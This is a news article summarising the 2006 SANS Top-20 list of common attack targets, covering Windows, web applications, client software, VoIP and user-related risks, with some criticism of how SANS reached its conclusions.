SANS hit list of security vulnerabilities - Windows out in front
The SANS (SysAdmin, Audit, Network, Security) Institute has once again published its security Top-20. As in the previous report, the hit list is dedicated to the twenty most common attack targets and, in addition to Windows and Unix vulnerabilities, also lists applications and network services. For the first time the heading "Security policy and personnel", which looks at the effect of the user on security, appears in the list.
Windows remains, as in the previous year, the most popular target, something to which the large number of zero day vulnerabilities (known vulnerabilities for which there is as yet no patch) contributed. This year Internet Explorer, vulnerabilities in Windows libraries and in Office offered a significant point of attack.
However, it is not always clear how SANS came to the remaining conclusions. Unix apparently appears on the list simply on the basis of possible configuration errors. A number of privilege elevation vulnerabilities in Linux, through which, for example, a Debian development server was hacked, are not included in the report. In contrast Mac OS X is on the list as a fairly unsafe operating system, for which SANS lists a total of 21 vulnerabilities in the CVE database, based on a number of errors in Safari, ImageIO and other software.
For cross platform applications, it is web applications which make the running. Hardly a day goes by without a cross-site scripting or SQL injection vulnerability or an opportunity for a remote file include being discovered in some PHP application. Client applications are close behind the web applications. P2P and instant messaging clients have now also grown to become a major entry point for hackers and viruses. Hackers exploit buffer overflows in the software whilst viruses take advantage of users' carelessness when exchanging files. Software intended to improve security is increasingly becoming itself a part of the problem. Vulnerabilities in anti-virus and backup software, spam filters, monitoring systems and directory services continue to present a high level of risk.
Voice over IP appears increasingly to be becoming the target of attacks, which is made easier by, for example, vulnerabilities in Cisco's Unified Call Manager and the PBX software Asterisk. In its "Security Policy and Personnel" section, SANS takes a look at the role played by guidelines and users. According to SANS, unauthorised devices on a network represent a considerable problem. This includes both connection of external laptops to the LAN and connection of infected USB flash drives to company PCs. In addition, too many users have too many privileges on their PCs, which leads to uncontrolled growth in installed software and subsequent security problems. That SANS identifies users as the target of phishing attacks should then come as no surprise.
The SANS Top-20 is unlikely to come as a revelation to many readers, as it did a few years ago. Nowadays the results of numerous other reports and studies by various manufacturers and suppliers are too similar.
- SANS Top-20 Internet Security Attack Targets, report for 2006